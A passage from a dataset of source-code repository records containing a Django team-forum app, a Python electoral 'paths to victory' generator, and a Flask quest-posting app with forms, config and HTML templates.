models.ForeignKey(TeamProfile)\n\ttitle = models.CharField(max_length=100)\n\n\tdef __unicode__(self):\n\t\treturn self.title\n\n\tdef num_posts(self):\n\t\treturn sum([t.num_posts() for t in self.threads.all()])\n\n\tdef last_post(self):\n\t\tthreads = self.threads.all()\n\t\tlast = none\n\t\tfor thread in threads:\n\t\t\tlastp = thread.last_post\n\t\t\tif lastp and (not last or lastp.date_created > last.date_created):\n\t\t\t\tlast = lastp\n\t\treturn last\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_forum_threads', kwargs={'team_id':self.team.id, 'forum_id':self.id})\n\n\nclass Thread(models.Model):\n\tforum = models.ForeignKey(Forum, related_name='threads')\n\tcreator = models.ForeignKey(User)\n\ttitle = models.CharField(max_length=100)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['-date_created']\n\n\tdef __unicode__(self):\n\t\treturn unicode(\"%s - %s\" % (self.creator, self.title))\n\n\tdef last_post(self): return first(self.posts.all())\n\tdef num_posts(self): return self.posts.count()\n\tdef num_replies(self): return self.posts.count() - 1\n\n\tdef get_absolute_url(self):\n\t\treturn reverse('team_forum_posts', kwargs={'team_id':self.forum.team.id, 'forum_id':self.forum.id, 'thread_id':self.id})\n\n\nclass Post(models.Model):\n\tthread = models.ForeignKey(Thread)\n\tcreator = models.ForeignKey(User)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\ttitle = models.CharField(max_length=60)\n\tcontent = models.TextField(max_length=1000)\n\n\tclass Meta:\n\t\tordering = ['date_created']\n\n\tdef __unicode__(self):\n\t\treturn unicode(\"%s - %s\" % (self.creator, self.title))\n\n\tdef last_post(self):\n\t\treturn u\"%s %s - %s\\n%s\" % (self.creator.first_name, self.creator.last_name, self.title, self.date_created)\n\n\tdef profile_data(self):\n\t\tp = self.creator\n\t\treturn p.userprofile.posts, p.userprofile.image\n\n\tdef display_post(self):\n\t\treturn u\"%s %s - %s (%s)\\n%s\" % (self.creator.first_name, self.creator.last_name, self.title, self.date_created, self.content)\n\nONE = 1\nTWO = 2\nTHREE = 3\nFOUR = 4\nFIVE = 5\nSIX = 6\nSEVEN = 7\nEIGHT = 8\nNINE = 9\nTEN = 10\nRATING_CHOICES = (\n\t(ONE, '1'),\n\t(TWO, '2'),\n\t(THREE, '3'),\n\t(FOUR, '4'),\n\t(FIVE, '5'),\n\t(SIX, '6'),\n\t(SEVEN, '7'),\n\t(EIGHT, '8'),\n\t(NINE, '9'),\n\t(TEN, '10'),\n)\n\nclass UserReview(models.Model):\n\tuser = models.ForeignKey(User, related_name='user_reviewed')\n\treviewed_by = models.ForeignKey(User, related_name='reviewer')\n\trating = models.IntegerField(choices=RATING_CHOICES, default=ONE)\n\tcontent = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['date_created']\n\n\nclass TeamReview(models.Model):\n\tteam = models.ForeignKey(TeamProfile)\n\treviewed_by = models.ForeignKey(User)\n\trating = models.IntegerField(choices=RATING_CHOICES, default=ONE)\n\tcontent = models.TextField(max_length=1000)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['date_created']\n\n\nclass UserStatus(models.Model):\n\tuser = models.ForeignKey(User)\n\tcontent = models.TextField(max_length = 500)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['-date_created']\n\n\nclass TeamStatus(models.Model):\n\tteam = models.ForeignKey(TeamProfile)\n\tcontent = models.TextField(max_length = 500)\n\tdate_created = models.DateTimeField(auto_now_add=True)\n\n\tclass Meta:\n\t\tordering = ['-date_created']"
},
{
"alpha_fraction": 0.512077271938324,
"alphanum_fraction": 0.695652186870575,
"avg_line_length": 16.25,
"blob_id": "e422b9c1599fe63ada6a0d3512973a9f09b3141c",
"content_id": "8af2126f08fc0f1ba828d3550ba69531b83ec650",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 207,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 12,
"path": "/requirements.txt",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "Django==1.8.3\nMySQL-python==1.2.5\nPillow==2.9.0\nargparse==1.2.1\ndjango-extensions==1.6.1\ndjango-stdimage==2.0.6\nprogressbar2==2.7.3\npydot==1.0.2\npygraphviz==1.3.1\npyparsing==1.5.7\nsix==1.10.0\nwsgiref==0.1.2\n"
},
{
"alpha_fraction": 0.8222222328186035,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 19.545454025268555,
"blob_id": "2aeef0acd73aa0bc62c45083b3f6ba5a9767e98a",
"content_id": "ff127e8117ca12a7220b61402c56ea31dc3c887e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/lfg_app/admin.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Category, SubCategory\n\n\[email protected](Category)\nclass CategoryAdmin(admin.ModelAdmin):\n\tpass\n\[email protected](SubCategory)\nclass SubCategoryAdmin(admin.ModelAdmin):\n\tpass"
},
{
"alpha_fraction": 0.5295903086662292,
"alphanum_fraction": 0.5326251983642578,
"avg_line_length": 29,
"blob_id": "7c795856e78ef4bfec37914f6dd17836b6bf5f70",
"content_id": "daa7b9ceca3db6fae4055eddf9500d6482580d47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 22,
"path": "/lfg_app/templates/lfg_app/team_forum.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_team.html\" %}\n\n{% block data %}\n<div class=\"context\">\n {% if logged_in_user == leader.user or logged_in_user in mods.user %}\n <div class=\"interaction\">\n <br>\n <a href=\"{% url 'team_forum_creation' requested_team.id %}\">Create a new subforum</a>\n <br>\n </div>\n {% endif %}\n <div class=\"context_data\">\n <ul>\n {% for result in forum_list %}\n <a class=\"task\" href=\"{{ result.get_absolute_url }}\"><l1 class=\"forum_thread\">{{ result.title|title }}</l1></a>\n {% empty %}\n <li>Create new subforums!</li>\n {% endfor %}\n </ul>\n </div>\n</div>\n{% endblock data %}"
},
{
"alpha_fraction": 0.6572437882423401,
"alphanum_fraction": 0.6643109321594238,
"avg_line_length": 30.55555534362793,
"blob_id": "4e441480bfd4bd80c2fed36533c1aa811bd67294",
"content_id": "40641940bb64e3aaf79f25a041c304e51ebeaf04",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 283,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 9,
"path": "/lfg_app/templates/lfg_app/team_creation_success.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_user.html\" %}\n\n{% block data %}\n<div>\n\t<h1>You have successfuly created your team!</h1>\n\t<p>Please update your info in Team management.</p>\n\t<a href=\"{% url 'team_overview' requested_team.id %}\">Click here to go to your new team.</a>\n</div>\n{% endblock data %}"
}
] | 12 |
jeremyjbowers/paths2victory | https://github.com/jeremyjbowers/paths2victory | 66a021a63db5c1261b3cd53a45c7045edd0209a8 | 425173c388b4c40154a3b60855fe576922c15715 | 61b604b559165a24bfd46fd3fe92f89a814da313 | refs/heads/main | 2022-12-20T06:48:41.570603 | 2020-09-21T18:50:33 | 2020-09-21T18:50:33 | 296,954,457 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5414392352104187,
"alphanum_fraction": 0.5533498525619507,
"avg_line_length": 29.545454025268555,
"blob_id": "d04e4fc71be3f9605850a37e1f7dcbcbde9c410a",
"content_id": "814f3155e42feeac9429b38d5948f4f41bae0f35",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2015,
"license_type": "permissive",
"max_line_length": 136,
"num_lines": 66,
"path": "/p2v.py",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "from itertools import permutations\n\nimport ujson as json\n\nimport settings\nimport utils\n\ndef direction_test(cand, rating):\n if cand['condition'] == \">\":\n if rating > 0:\n return True\n\n if cand['condition'] == \"<\":\n if rating < 0:\n return True\n\n return False\n\n\nsheet = utils.get_sheet(settings.SHEET_ID, settings.SHEET_RANGE)\n\nfor cand in settings.CANDIDATES:\n states = [{\n \"state\": a['state'],\n \"ev\": int(a['ev']), \n \"pollclose\": a['first_results'],\n \"90pct12hrs\": utils.x_to_bool(a['90pct12hr']), \n \"swing\": utils.x_to_bool(a['swing2']), \n \"rating\": int(a['rating'])\n } for a in sheet]\n\n swing = [a for a in states if a['swing'] == True]\n\n locked_states = [a for a in states if a['swing'] == False and direction_test(cand, a['rating'])]\n\n cand_evs = sum([a['ev'] for a in locked_states])\n\n paths = utils.elect_paths(swing, 270 - cand_evs)\n\n unique_paths = set([])\n\n for path in paths:\n path_evs = sum([p['ev'] for p in path]) + cand_evs\n states = sorted([f\"{p['state']} ({p['ev']})\" for p in path], key=lambda x: x[0])\n state_string = \", \".join(states)\n state_string = f\"{path_evs}: {state_string}\"\n unique_paths.add(state_string)\n\n parsed_paths = []\n\n for a in unique_paths:\n path_dict = {\n \"evs\": int(a.split(': ')[0]),\n \"states\": [{\"state\": z.split(\" (\")[0], \"ev\": int(z.split(\" (\")[1].replace(\")\", \"\"))} for z in a.split(\": \")[1].split(\", \")],\n \"state_string\": a.split(\": \")[1]\n }\n path_dict['num_states'] = len(path_dict['states'])\n if path_dict['evs'] < 300:\n parsed_paths.append(path_dict)\n\n sorted_paths = sorted(parsed_paths, key=lambda x: x['num_states'])\n\n print(f\"{cand['name']} has {cand_evs} locked-in EVs and {len(sorted_paths)} paths to victory\")\n\n with open(f'{cand[\"slug\"]}_paths.json', 'w') as writefile:\n writefile.write(json.dumps(sorted_paths, indent=4))"
},
{
"alpha_fraction": 0.6507436037063599,
"alphanum_fraction": 0.6813880205154419,
"avg_line_length": 29.83333396911621,
"blob_id": "47dfa7cc67d44b8c4745ddf3912a282811e3a7c0",
"content_id": "a9ad66708a9f14e29014f54fe5937700888b46c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2219,
"license_type": "permissive",
"max_line_length": 337,
"num_lines": 72,
"path": "/README.md",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "# Paths 2 Victory\n\nInspired by [this lovely Mike Bostock project](https://source.opennews.org/articles/nyts-512-paths-white-house/) and [this lovely NPR Viz project](http://blog.apps.npr.org/2012/11/13/election-2012-generating-the-combinations.html), this is a simple \"paths to victory\" generator for an arbitrary set of candidates in an electoral contest.\n\n## Getting started\n\n1. Start a Google sheet with your race ratings. Here's what we expect as headers:\n```\nstate\tfirst_results\tev\tswing\tswing2\t90pct12hr rating\n```\n* `state`: string, a state abbreviation\n* `first_results`: string, a parseable timestamp for a time when first results could be announced\n* `ev`: int, a number of electoral votes\n* `swing`: boolean, is this in a group of swing states?\n* `swing2`: boolean, is this in an expanded group of swing states?\n* `90pct12hr`: boolean, do we expect a large percentage of the total vote within 12 hours of poll closing?\n* `rating`: int, range 3 to -3 where 3 is locked Democratic and -3 is locked Republican and 0 is a swing state\n\n2. Export some environment variables. You need `SHEET_ID` to correspond to the ID of your Google sheet and `SHEET_RANGE` to correspond to the range of cells you'd like to capture for use.\n\n3. Save your Google auth credentials as a JSON file. [This is a pretty good explainer.](https://cloud.google.com/docs/authentication/getting-started) Save the resulting file as `credentials.json` (it's gitignored) and make sure it's in the root of this project.\n\n## Usage\n```sh\nmkvirtualenv p2v\ngit clone [email protected]:jeremyjbowers/paths2victory.git\ncd paths2victory\npip install -r requirements.txt\np2v.py\n```\n\nThis produces a JSON file for each of the candidates listed in `settings.CANDIDATES` using their `slug` as the namespace for the file.\n\n### Sample output\n```json\n[\n {\n \"evs\": 271,\n \"states\": [\n {\n \"state\": \"FL\",\n \"ev\": 29\n },\n {\n \"state\": \"PA\",\n \"ev\": 20\n }\n ],\n \"state_string\": \"FL (29), PA (20)\",\n \"num_states\": 2\n },\n {\n \"evs\": 283,\n \"states\": [\n {\n \"state\": \"FL\",\n \"ev\": 29\n },\n {\n \"state\": \"GA\",\n \"ev\": 16\n },\n {\n \"state\": \"MI\",\n \"ev\": 16\n }\n ],\n \"state_string\": \"FL (29), GA (16), MI (16)\",\n \"num_states\": 3\n }\n]\n```"
},
{
"alpha_fraction": 0.6391571760177612,
"alphanum_fraction": 0.6444249153137207,
"avg_line_length": 26.80487823486328,
"blob_id": "9eb163c2476a686673d7c63017f79c99ca450862",
"content_id": "659eaad7f7363446d6bdee4865802c2c171cf8a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1139,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 41,
"path": "/utils.py",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "import pickle\nimport os.path\n\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\n\n\ndef get_sheet(sheet_id, sheet_range):\n SCOPES = [\"https://www.googleapis.com/auth/spreadsheets.readonly\"]\n\n creds = service_account.Credentials.from_service_account_file(\n \"credentials.json\", scopes=SCOPES\n )\n service = build(\"sheets\", \"v4\", credentials=creds)\n sheet = service.spreadsheets()\n\n result = sheet.values().get(spreadsheetId=sheet_id, range=sheet_range).execute()\n values = result.get(\"values\", None)\n\n if values:\n return [dict(zip(values[0], r)) for r in values[1:]]\n return []\n\n\ndef x_to_bool(possible_bool):\n if isinstance(possible_bool, str):\n if possible_bool.lower() in [\"y\", \"yes\", \"t\", \"true\", \"x\"]:\n return True\n return False\n\n\ndef elect_paths(states, target, paths=[], paths_sum=0):\n if paths_sum == target:\n yield paths\n\n if paths_sum >= target:\n yield paths\n\n for i, n in enumerate(states):\n remaining = states[i + 1:]\n yield from elect_paths(remaining, target, paths + [n], paths_sum + n['ev'])"
},
{
"alpha_fraction": 0.5042492747306824,
"alphanum_fraction": 0.7082152962684631,
"avg_line_length": 17.578947067260742,
"blob_id": "5556a038d90f86adab6b0d71b0e4a79262c5775c",
"content_id": "2330def27d99612bc566ce7c6d80d693eba1fbc0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 353,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 19,
"path": "/requirements.txt",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "cachetools==4.1.1\ncertifi==2020.6.20\nchardet==3.0.4\ngoogle-api-python-client==1.7.11\ngoogle-auth==1.11.2\ngoogle-auth-httplib2==0.0.3\ngoogle-auth-oauthlib==0.4.1\nhttplib2==0.18.1\nidna==2.10\noauthlib==3.1.0\npyasn1==0.4.8\npyasn1-modules==0.2.8\nrequests==2.24.0\nrequests-oauthlib==1.3.0\nrsa==4.0\nsix==1.15.0\nujson==3.2.0\nuritemplate==3.0.1\nurllib3==1.25.10\n"
},
{
"alpha_fraction": 0.569037675857544,
"alphanum_fraction": 0.569037675857544,
"avg_line_length": 25.66666603088379,
"blob_id": "38d86e10f3c1a8e14e9b035346d2175d3de912ab",
"content_id": "3165fdb3c62f6a9be5c602dbe9553aa7a0648a99",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 239,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 9,
"path": "/settings.py",
"repo_name": "jeremyjbowers/paths2victory",
"src_encoding": "UTF-8",
"text": "import os\n\nSHEET_ID = os.environ.get('SHEET_ID', None)\nSHEET_RANGE = os.environ.get('SHEET_RANGE', None)\n\nCANDIDATES = [\n {\"name\": \"Joe Biden\", \"slug\": \"biden\", \"condition\": \">\"},\n {\"name\": \"Donald Trump\", \"slug\": \"trump\", \"condition\": \"<\"}\n]"
}
] | 5 |
moudNM/queseek | https://github.com/moudNM/queseek | 4fc4eb1e755607dc42b7bc33b71116bce315e279 | 99e4c79f691ff52c62360f953ef7b0033a5d3f72 | c161e79886b7ee1bc15d13924809fda26cd371ff | refs/heads/master | 2021-06-20T08:39:44.369490 | 2020-02-04T13:39:15 | 2020-02-04T13:39:15 | 190,750,924 | 0 | 1 | null | 2019-06-07T13:48:25 | 2020-02-04T13:39:23 | 2021-03-20T01:07:57 | Python | [
{
"alpha_fraction": 0.6621052622795105,
"alphanum_fraction": 0.6810526251792908,
"avg_line_length": 24.62162208557129,
"blob_id": "17a395ba0b7c483b1e1c15a413e185b90b0e1f4c",
"content_id": "1ba1d6cb6a8740f617b4fec0a4a75c776ae15b51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 952,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 37,
"path": "/app/bp_api/controllers.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, render_template, jsonify, request\nfrom app import app\n\napi = Blueprint('api', __name__, template_folder='templates')\n\[email protected]('/')\ndef api_index():\n\treturn 'api homepage'\n\[email protected]('/datatable_example')\ndef api_datatable_example():\n\tresponse = {}\n\t\"\"\" \n\t\t1. deliberately left out location, \n\t\t students to make it work,\n\t\t2. make datatable display url as anchor in DT\n\t\"\"\"\n\t\t\n\tevent_a = []\n\tevent_a.append(\"WWCode Singapore's social coding event\")\n\tevent_a.append(\"Mon, 1 october, 6.30pm - 8:20pm\")\n\tevent_a.append(\"http://meetu.ps/e/FcVHX/8qCls/d\")\n\tevent_a.append(\"Robert Sim\")\n\t\n\tevent_b = []\n\tevent_b.append(\"HackerspaceSG Plenum (tentative)\")\n\tevent_b.append(\"Wed, 10 October, 8:00pm – 8:30pm\")\n\tevent_b.append(\"https://hackerspace.sg/plenum/\")\n\tevent_b.append(\"HSG\")\n\t\n\tresponse['data'] = []\n\tresponse['data'].append(event_a)\n\tresponse['data'].append(event_b)\n\t\n\tresponse = jsonify(response)\n\n\treturn response\n\t\n"
},
{
"alpha_fraction": 0.8529411554336548,
"alphanum_fraction": 0.8529411554336548,
"avg_line_length": 33,
"blob_id": "c5ee1b79ccac32b021efe153815518ada6d78bcc",
"content_id": "ce37d42178f0a12bc408bb536226f6199afedf51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 7,
"path": "/app/bp_events/forms.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField, IntegerField\nfrom wtforms.widgets import TextArea\nfrom wtforms.validators import DataRequired\n\nclass CreateEvent(FlaskForm):\n\tpass\n"
},
{
"alpha_fraction": 0.6756359934806824,
"alphanum_fraction": 0.6771036982536316,
"avg_line_length": 28.214284896850586,
"blob_id": "6711ce9483fc9deffbd6998e96890dc53719df81",
"content_id": "8535f12b59a8e9bff2a21eddb8d33997b349314d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2044,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 70,
"path": "/app/forms.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask_wtf import FlaskForm\nfrom wtforms import StringField, PasswordField, BooleanField, SubmitField, IntegerField, validators, SelectField, HiddenField\nfrom wtforms.widgets import TextArea\nfrom wtforms.validators import DataRequired\n\n\nclass LoginForm(FlaskForm):\n username = StringField('Username')\n password = PasswordField('Password')\n submit = SubmitField('Login')\n\n def validate_username(self, username):\n pass\n\n def validate_email(self, email):\n pass\n\n\nclass SignUpForm(FlaskForm):\n email = StringField('Email')\n username = StringField('Username')\n password = PasswordField('New Password', [\n validators.DataRequired()\n ])\n confirm = PasswordField('Repeat Password', [\n validators.DataRequired()\n ])\n submit = SubmitField('Sign Up')\n update = SubmitField('Update')\n\n\nclass QuestForm(FlaskForm):\n\n type = SelectField(\"Type: \", choices=[(0, \"Hero Quest (Lost an item)\"), (1, \"Side Quest (Errand)\")], default=0)\n item = StringField('Item:', [\n validators.DataRequired()\n ])\n location = StringField('Location:', [\n validators.DataRequired()\n ])\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')\n\n\nclass SeekForm(FlaskForm):\n\n item = StringField('Item:', [\n validators.DataRequired()\n ])\n location = StringField('Location:', [\n validators.DataRequired()\n ])\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')\n\n\nclass QuestCommentsForm(FlaskForm):\n questId = HiddenField('questId:')\n userId = HiddenField('userId:')\n is_creator = HiddenField('is_creator:')\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')\n\n\nclass SeekCommentsForm(FlaskForm):\n seekId = HiddenField('seekId:')\n userId = HiddenField('userId:')\n is_creator = HiddenField('is_creator:')\n description = StringField('Description:', widget=TextArea())\n submit = SubmitField('Submit')"
},
{
"alpha_fraction": 0.6414633989334106,
"alphanum_fraction": 0.70243901014328,
"avg_line_length": 26.266666412353516,
"blob_id": "04d59b6809ec7386cee5ed5520f83df86d9b21dd",
"content_id": "62fba328769aa7b4fe9ef95f56eefdc8fdcbabab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 410,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 15,
"path": "/app/config.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "import os\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\nDEBUG = True\n\nSECRET_KEY = '123456789'\nDATABASE_FILE = 'UserDatabase.db'\nSQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(os.path.join(BASE_DIR, DATABASE_FILE))\nDATABASE_CONNECT_OPTIONS = {}\n\n#INTERNAL_URL = 'http://192.168.142.136:5000/'\n\n#UPLOAD_FOLDER = \"{}\".format(os.path.join(BASE_DIR, 'uploads/'))\n\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\n"
},
{
"alpha_fraction": 0.36656609177589417,
"alphanum_fraction": 0.37328580021858215,
"avg_line_length": 41.15976333618164,
"blob_id": "4fab06f27927bef7fec4285ca44905022e24e2ec",
"content_id": "519514539b49ab6414866745ce1d320afbaab200",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7292,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 169,
"path": "/app/templates/quest.html",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\r\n<html lang=\"zxx\">\r\n\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"description\" content=\"Queseek\">\r\n <meta name=\"keywords\" content=\"Queseek, quest, seek\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <meta http-equiv=\"X-UA-Compatible\" content=\"ie=edge\">\r\n <title>Queseek</title>\r\n {% include \"base/icon.html\" %}\r\n <!-- Google Font -->\r\n <link href=\"https://fonts.googleapis.com/css?family=Muli:300,400,500,600,700,800,900&display=swap\" rel=\"stylesheet\">\r\n\r\n <!-- Css Styles -->\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/bootstrap.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/font-awesome.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/themify-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/elegant-icons.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/owl.carousel.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/nice-select.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/jquery-ui.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/slicknav.min.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/style.css')}}\" type=\"text/css\">\r\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/table.css')}}\" type=\"text/css\">\r\n</head>\r\n\r\n<body>\r\n\r\n\r\n<!-- Page Preloder -->\r\n<div id=\"preloder\">\r\n <div class=\"loader\"></div>\r\n</div>\r\n\r\n<!-- Header Section Begin -->\r\n<header class=\"header-section\">\r\n\r\n {% include \"base/topbar.html\" %}\r\n {% include \"base/menu.html\" %}\r\n\r\n</header>\r\n<!-- Header End -->\r\n\r\n\r\n<!-- Hero Section Begin -->\r\n<section class=\"hero-section\">\r\n <div class=\"hero-items\">\r\n\r\n <div class=\"topbar-cover2\">\r\n <div class=\"desc\">\r\n\r\n <section class=\"cd-faq\">\r\n\r\n\r\n <div class=\"cd-faq-categories\">\r\n\r\n {% if page == 'sq' %}\r\n <a href=\"{{url_for('hero_quests')}}\">Hero Quests</a>\r\n <a class=\"active\" href=\"{{url_for('side_quests')}}\">Side Quests</a>\r\n\r\n {% else %}\r\n <a class=\"active\" href=\"{{url_for('hero_quests')}}\">Hero Quests</a>\r\n <a href=\"{{url_for('side_quests')}}\">Side Quests</a>\r\n\r\n {% endif %}\r\n </div>\r\n\r\n <!-- Shopping Cart Section Begin -->\r\n <section class=\"shopping-cart spad\">\r\n\r\n <div class=\"blog-details-inner\">\r\n <div class=\"blog-detail-title\"><h2>\r\n {% if page == 'sq' %}\r\n Side Quests\r\n {% else %}\r\n Hero Quests\r\n {% endif %}\r\n </h2>\r\n\r\n </div>\r\n </div>\r\n\r\n <div class=\"center-button\">\r\n {% include \"base/button.html\" %}\r\n </div>\r\n <div class=\"container\">\r\n <div class=\"row\">\r\n <div class=\"col-lg-12\">\r\n <div class=\"cart-table\">\r\n <table>\r\n <thead>\r\n <tr>\r\n <th>Reward</th>\r\n <th>Quest ID</th>\r\n <th>Item</th>\r\n <th>Description</th>\r\n <th>Username</th>\r\n <th>Date Posted</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n\r\n {% for row in rows %}\r\n <tr>\r\n <td class=\"cart-pic\"><h5>{{ row[1].reward }}</h5></td>\r\n <td class=\"cart-pic\">\r\n <h5>\r\n <a href='/quest/{{row[1].questId}}'>{{row[1].questId}}</a>\r\n </h5>\r\n </td>\r\n <td class=\"cart-pic\">{{ row[1].item }}</td>\r\n <td class=\"cart-pic\">\r\n\r\n {% if row[1].description|length > 50 %}\r\n {{ row[1].description[:50] + '...'}}\r\n\r\n {% else %}\r\n {{ row[1].description }}\r\n\r\n {% endif %}\r\n\r\n </td>\r\n <td class=\"cart-pic\">{{ row[0].username }}</td>\r\n <td class=\"cart-pic\">{{ row[1].posted_at.strftime('%d/%m/%Y %I:%M %p')\r\n }}\r\n </td>\r\n\r\n </tr>\r\n\r\n {% endfor %}\r\n\r\n </tbody>\r\n </table>\r\n </div>\r\n\r\n </div>\r\n </div>\r\n </div>\r\n </section>\r\n <!-- Shopping Cart Section End -->\r\n\r\n </section>\r\n\r\n\r\n </div>\r\n </div>\r\n\r\n\r\n </div>\r\n</section>\r\n\r\n\r\n<!-- Hero Section End -->\r\n\r\n<!-- Js Plugins -->\r\n<script src=\"{{url_for('static', filename='js/jquery-3.3.1.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/bootstrap.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery-ui.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.countdown.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.nice-select.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.zoom.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.dd.min.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/jquery.slicknav.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/main.js')}}\"></script>\r\n<script src=\"{{url_for('static', filename='js/table.js')}}\"></script>\r\n</body>\r\n\r\n</html>"
},
{
"alpha_fraction": 0.7128205299377441,
"alphanum_fraction": 0.7153846025466919,
"avg_line_length": 24.161291122436523,
"blob_id": "c058f5ed55e7e9fbaa6be3bce7589bd4de818f77",
"content_id": "4a8ca22fdde12f56b8fbb0025d176f3e26929a7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 780,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 31,
"path": "/app/bp_events/controllers.py",
"repo_name": "moudNM/queseek",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint, render_template, jsonify, request\nfrom flask_login import login_required\n#from app.bp_events.forms import CreateEvent\nfrom app import app\n\n\nevents = Blueprint('events', __name__, template_folder='templates')\n\n#@events.route('/')\n#def events_home():\n#\treturn \"events homepage\"\n\n#@events.route('/')\n#def events_home():\n#\treturn render_template('events/list.html')\n\n#@events.route('/')\n#def events_home():\n#\treturn render_template('events/date.html', myname=\"anyu\")\n\t#return render_template('events/listv2.html', myname=\"anyu\")\n\[email protected]('/')\ndef events_home():\n\treturn render_template('events/listv3.html', myname=\"anyu\")\n\t\n\[email protected]('/create')\n@login_required\ndef events_create():\n\tform = CreateEvent()\n\treturn render_template('events/create.html', form=form)\n"
},
{
"alpha_fraction": 0.5589882731437683,
"alphanum_fraction": 0.5656428933143616,
